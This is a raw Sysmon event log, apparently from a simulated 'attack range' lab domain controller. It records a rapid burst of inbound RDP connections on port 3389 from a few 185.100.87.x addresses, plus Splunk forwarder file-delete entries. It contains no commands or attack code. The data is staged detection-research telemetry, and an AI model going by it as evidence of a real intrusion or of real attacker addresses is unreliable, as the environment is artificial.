13:05:09.916{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51916-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099860Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.894{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33920-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099859Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.836{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51756-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099858Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.814{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51708-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099857Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.790{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54966-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099856Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.771{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33762-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099855Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.748{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54866-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.732{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54856-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.708{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54800-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.680{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51418-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.675{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51410-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099850Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.664{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54726-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099849Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.625{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51292-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099848Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.607{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54608-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.604{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33474-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.576{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51198-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.542{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51144-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.521{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33370-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.506{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-51088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.478{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33300-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.445{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54294-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.401{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54194-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.389{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54182-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.379{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50808-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.377{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-54146-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.376{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50784-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.330{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50728-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.317{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-33030-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.306{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-32996-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.300{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53998-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.277{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50636-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.262{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50620-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.261{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-32936-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.260{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-53912-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.243{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-32914-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.220{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-50494-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:09.200{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-32840-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099824Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:13.287{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D067246FABD34B9E6FD9EFE7EC33037A,SHA256=3194E8B467416FEEECF81428DCB65FC28E3923FD77FD4B333F8D20F44A31D2AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099898Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.136{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53338-false10.0.1.12-8000- 354300x800000000000000099897Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.102{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-54350-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099896Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.093{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-57502-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099895Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.019{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-57348-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099894Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.997{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-57320-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099893Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.918{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-57156-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099892Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.854{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53834-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099891Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.801{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56898-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099890Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.793{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53712-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099889Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.779{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56848-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099888Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.728{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56756-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099887Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.723{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56716-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099886Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.692{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56654-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099885Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.616{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56530-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099884Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.557{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53260-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099883Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.507{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53174-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099882Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.487{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-53114-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099881Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.427{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56186-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099880Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.422{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56164-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099879Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.410{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56158-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099878Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.381{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56088-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099877Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.370{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-56070-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099876Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.306{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55904-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099875Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.260{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52626-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099874Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.214{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52556-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099873Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.183{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-34390-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099872Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.167{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52448-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.131{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.231-52336-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.112{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55566-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.107{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55512-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.088{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55498-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099867Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.054{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.93-34202-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099866Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.041{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55426-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099865Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:10.023{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-55388-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 23542300x800000000000000099864Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:14.427{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=519CEC48120EFB8A218DD46F6D126CE3,SHA256=CE740ECB6FF5914A72D2E5BBE0C931FCBA8CE12BC404AA3788D271F0C9FAC74A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000099904Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:15.568{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F865FA246E3CD0616F578F6F561637F,SHA256=D85A83758885826E2A45B6E0C08F0C176E11BCFBEAB664C3FD037CE7B34360D6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000099903Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.723{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-58678-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099902Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.584{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-58430-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099901Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.448{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.100.87.94-58196-false10.0.1.14win-dc-ctus-attack-range-994.attackrange.local3389ms-wbt-server 354300x800000000000000099900Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:05:11.363{326FD73D-A254-6294-0F00-000000005502}368C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK 